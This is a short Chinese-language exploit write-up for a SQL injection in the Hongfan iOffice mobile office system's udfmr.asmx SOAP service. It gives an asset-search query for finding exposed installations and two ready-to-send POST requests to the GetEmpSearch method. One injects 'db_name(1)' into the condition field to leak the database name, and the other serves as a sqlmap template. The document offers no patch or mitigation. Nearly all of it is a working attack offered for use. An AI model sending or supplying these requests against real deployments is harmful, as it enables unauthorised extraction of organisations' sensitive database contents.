红帆iOffice udfmr存在SQL注入漏洞
一、漏洞简介
红帆iOffice移动办公系统,是广州红帆电脑科技有限公司基于微软.NET技术研发的,建立以笔记本、手机等便捷终端为载体实现的移动信息化系统。将智能手机、无线网络、OA系统三者有机结合,推出红帆iOffice移动办公系统,实现任何办公地点和办公时间的无缝接入,提高办公效率。红帆iOffice udfmr存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感数据。
二、影响版本
- 红帆iOffice
三、资产测绘
- hunter
app.name="红帆 iOffice" - 特征
四、漏洞复现
POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
<condition>1=db_name(1)</condition>
</GetEmpSearch>
</soap:Body>
</soap:Envelope>
sqlmap
POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
<condition>1=1</condition>
</GetEmpSearch>
</soap:Body>
</soap:Envelope>
